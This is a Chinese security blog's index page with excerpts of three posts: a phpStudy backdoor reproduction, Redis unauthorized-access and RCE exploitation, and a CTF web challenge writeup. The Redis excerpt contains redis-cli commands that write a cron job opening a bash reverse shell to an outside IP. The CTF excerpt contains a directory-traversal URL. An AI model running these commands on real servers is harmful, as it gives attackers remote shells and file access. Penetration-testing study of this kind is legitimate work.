刘功瑞的博客
有一天你突然惊醒,发现这一切,都只不过是一场梦。
2019年12月20日
集成环境phpstudy后门利用复现
0x00 简介phpStudy是一个PHP调试环境的程序集成包。该程序包集成最新的Apache+PHP+MySQL+phpMyAdmin+ZendOptimizer,一次性安装,无须配置即可使用,是非常方便、好用的PHP调试环境0x01 漏洞概述使用广泛的PHP环境集成程序包phpStudy被公告疑似遭遇供应链攻击,程序包自带PHP的php_xmlrpc.dll模块隐藏有后门(来自雷神众测)0x02 影响版本phpStudy20161103版本:php5.4.45与php5.2.17phpStu
作者:admin , 分类:PHP , 浏览:669 , 评论:0
2019年12月19日
redis未授权漏洞和主从复制rce漏洞利用
未授权无需认证访问内部数据库。利用计划任务反弹shell12345redis-cli -h 192.168.2.6set x "\n* * * * * bash -i >& /dev/tcp/192.168.1.1/4444 0>&1\n"config set dir /var/spool/cron/config set dbfilename rootsave获取webshel
作者:admin , 分类:内网渗透 , 浏览:692 , 评论:0
2019年12月12日
XCTF 攻防世界 web进阶 TimeKeeper writeup
知识点目录穿越,可任意文件读取flask模板注入,可获取SECRET_KEY,从而伪造session成为管理员上传tar文件自解压,可利用软连接读文件debug模式,生成pin码的关键信息都可获取到,计算pin码,执行命令目录穿越http://111.198.29.45:38930/asserts/..%2f..%2f..%2f..%2fflag #读取假的flag ciscn{this_is_a_sample_flag}格式化字符串+SESSIO
作者:admin , 分类:CTF , 浏览:616 , 评论:0
- 搜索
- 文章归档
- 网站收藏
- 友情链接
-
